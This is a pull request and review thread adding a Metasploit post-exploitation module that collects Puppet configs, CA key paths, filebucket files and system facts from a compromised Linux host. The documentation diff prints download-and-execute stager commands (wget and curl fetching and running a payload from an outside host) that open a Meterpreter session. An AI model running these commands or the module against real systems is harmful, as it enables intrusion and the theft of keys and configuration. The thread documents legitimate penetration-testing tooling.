### PR TITLE
Puppet: post module to gather configs and such

### PR DESCRIPTION
**Pull request by h00die**
This PR adds a post gather module to get puppet configs and sensitive files!

## Verification

see individual markdowns for instructions

### CODE REVIEW

**Comment by h00die** [comment]
keep a WIP as the agent deployer is close, but not 100% yet, but figured this is a heads up that its being worked.

File: documentation/modules/post/linux/gather/puppet.md [hunk 1]
```diff
@@ -0,0 +1,386 @@
...
+[*] Using URL: http://1.1.1.1:8181/Gc7zrm8CdKGSe2
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO CmKyTd1N --no-check-certificate http://1.1.1.1:8181/Gc7zrm8CdKGSe2; chmod +x CmKyTd1N; ./CmKyTd1N& disown
+[*] Sending stage (3045380 bytes) to 172.20.0.3
+[msf](Jobs:1 Agents:0) post(linux/gather/puppet) > [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.20.0.3:59338) at 2023-12-10 10:38:11 -0500
+```
+
+We now have a `wget` command, however the system doesn't have `wget`. Alter it to a `curl`
+command similar to `curl -k http://1.1.1.1:8181/Gc7zrm8CdKGSe2 > uBgZi2eZ; chmod +x uBgZi2eZ; ./uBgZi2eZ& disown`
```
Comment (bwatters-r7) [inline documentation/modules/post/linux/gather/puppet.md:82]: Do we need `-k` for http?

File: modules/post/linux/gather/puppet.rb [hunk 2]
```diff
@@ -0,0 +1,204 @@
...
+      l = store_loot('puppet.filebucket', 'text/plain', session, file_content, file[3].split('/').last, 'Puppet filebucket stored file')
+      table << [file[0], "#{file[1]} #{file[2]}", file[3], l]
+    end
+    print_good(table.to_s) unless table.rows.empty?
+  end
+
+  def get_config
+    # we prefer to run `puppet config print` over getting puppet.conf since it contains env items as well merged in
+    config = cmd_exec("#{puppet_exe} config print")
+    l = store_loot('puppet.conf', 'text/plain', session, config, 'puppet.conf', 'Puppet config file')
```
Comment (bwatters-r7) [inline modules/post/linux/gather/puppet.rb:89]: single char variable

File: modules/post/linux/gather/puppet.rb [hunk 3]
```diff
@@ -0,0 +1,204 @@
...
+      mod_version = mod_version.gsub('(', '').gsub(')', '')
+      table << [mod_name, mod_version]
+    end
+    print_good(table.to_s) unless table.rows.empty?
+  end
+
+  def facter
+    facter_json = cmd_exec("#{facter_exe} -j")
+    facter_json = JSON.parse(facter_json)
+    l = store_loot('puppet.facter', 'text/plain', session, facter_json, 'puppet.facter', 'Puppet facter')
```
Comment (bwatters-r7) [inline modules/post/linux/gather/puppet.rb:160]: single char var

**Comment by h00die** [comment]
don't think i'm going to get back around to puppet, unless theres a puppet admin who wants to explain things to me, as its too confusing to actually use.

**Comment by jheysel-r7** [comment]
> don't think i'm going to get back around to puppet, unless theres a puppet admin who wants to explain things to me, as its too confusing to actually use.

No worries @h00die - does this mean this PR can be closed? Or is it ready for review in the state that it's in?

**Comment by h00die** [comment]
Ready for review in it's current state. My original idea to have a node deployer hasn't planned out as I can't seem to understand how puppet works

**Review by jheysel-r7 — COMMENTED** [review]
Thanks for the module @h00die! Looking good, just a couple minor comments.

```
msf6 post(linux/gather/puppet) > rexploit
[*] Reloading module...

[+] Stored puppet config to: /Users/jheysel/.msf4/loot/20240124105544_default_172.22.0.3_puppet.conf_973478.txt
[+] Puppet Configuration
====================

 Parameter  Value                                        Loot Location
 ---------  -----                                        -------------
 cacert     /etc/puppetlabs/puppetserver/ca/ca_crt.pem   /Users/jheysel/.msf4/loot/20240124105545_default_172.22.0.3_etcpuppetlabs_488284.txt
 cakey      /etc/puppetlabs/puppetserver/ca/ca_key.pem   /Users/jheysel/.msf4/loot/20240124105545_default_172.22.0.3_etcpuppetlabs_252907.txt
 passfile   /etc/puppetlabs/puppet/ssl/private/password
 server     puppet
 user       puppet

[+] Stored facter to: /Users/jheysel/.msf4/loot/20240124105546_default_172.22.0.3_puppet.modules_861636.txt
[+] Puppet Modules
==============

 Module             Version
 ------             -------
 puppetlabs-apache  v12.0.2
 puppetlabs-concat  v9.0.2
 puppetlabs-stdlib  v9.4.1

[+] Puppet Filebucket Files
=======================

 Hash                                                              Date                 Filename       Loot location
 ----                                                              ----                 --------       -------------
 f2ca1bb6c7e907d06dafe4687e579fce76b37e4e93b7605022da52e6ccc26fd2  2024-01-24 02:24:18  /tmp/TestFile  /Users/jheysel/.msf4/loot/20240124105550_default_172.22.0.3_puppet.filebucke_436017.txt

[+] Stored facter to: /Users/jheysel/.msf4/loot/20240124105551_default_172.22.0.3_puppet.facter_573034.txt
[+] Stored packages to: /Users/jheysel/.msf4/loot/20240124105554_default_172.22.0.3_puppet.packages_036470.txt
[+] Puppet Packages
===============

 Package                   Version                                  Source
 -------                   -------                                  ------
 adduser                   3.118ubuntu5                             apt
 apt                       2.4.11                                   apt
 base-files                12ubuntu4.4                              apt
 base-passwd               3.5.52build1                             apt
 base64                    0.2.0                                    puppet_gem
 bash                      5.1-6ubuntu1                             apt
 
 <redacted>
 
 yaml                      0.1.0                                    puppet_gem
 zlib                      1.1.0                                    puppet_gem
 zlib1g                    1:1.2.11.dfsg-2ubuntu9.2                 apt

[*] Post module execution completed
```

**Comment by h00die** [comment]
Thanks for the patience @jheysel-r7 . I think I've now resolved everything

**Comment by jheysel-r7** [comment]
Thanks for pushing those update @h00die, looking good! 
```
msf6 post(linux/gather/puppet) > run

[+] Stored puppet config to: /Users/jheysel/.msf4/loot/20240130191621_default_172.27.0.2_puppet.conf_558748.txt
[+] Puppet Configuration
====================

 Parameter  Value                                        Loot Location
 ---------  -----                                        -------------
 cacert     /etc/puppetlabs/puppetserver/ca/ca_crt.pem   /Users/jheysel/.msf4/loot/20240130191621_default_172.27.0.2_etcpuppet
                                                         labs_938484.txt
 cakey      /etc/puppetlabs/puppetserver/ca/ca_key.pem   /Users/jheysel/.msf4/loot/20240130191622_default_172.27.0.2_etcpuppet
                                                         labs_663779.txt
 passfile   /etc/puppetlabs/puppet/ssl/private/password
 server     puppet
 user       puppet

[+] Stored facter to: /Users/jheysel/.msf4/loot/20240130191623_default_172.27.0.2_puppet.modules_948156.txt
[+] Stored facter to: /Users/jheysel/.msf4/loot/20240130191627_default_172.27.0.2_puppet.facter_144831.txt
[+] Stored packages to: /Users/jheysel/.msf4/loot/20240130191629_default_172.27.0.2_puppet.packages_623111.txt
[+] Puppet Packages
===============

 Package                   Version                                  Source
 -------                   -------                                  ------
 adduser                   3.118ubuntu5                             apt
 apt                       2.4.11                                   apt
 base-files                12ubuntu4.4                              apt
...
 zlib                      1.1.0                                    puppet_gem
 zlib1g                    1:1.2.11.dfsg-2ubuntu9.2                 apt

[*] Post module execution completed
```

**Comment by jheysel-r7** [comment]
# Release Notes
This PR adds a post gather module to get Puppet configs and other sensitive files.

**Pull request merged**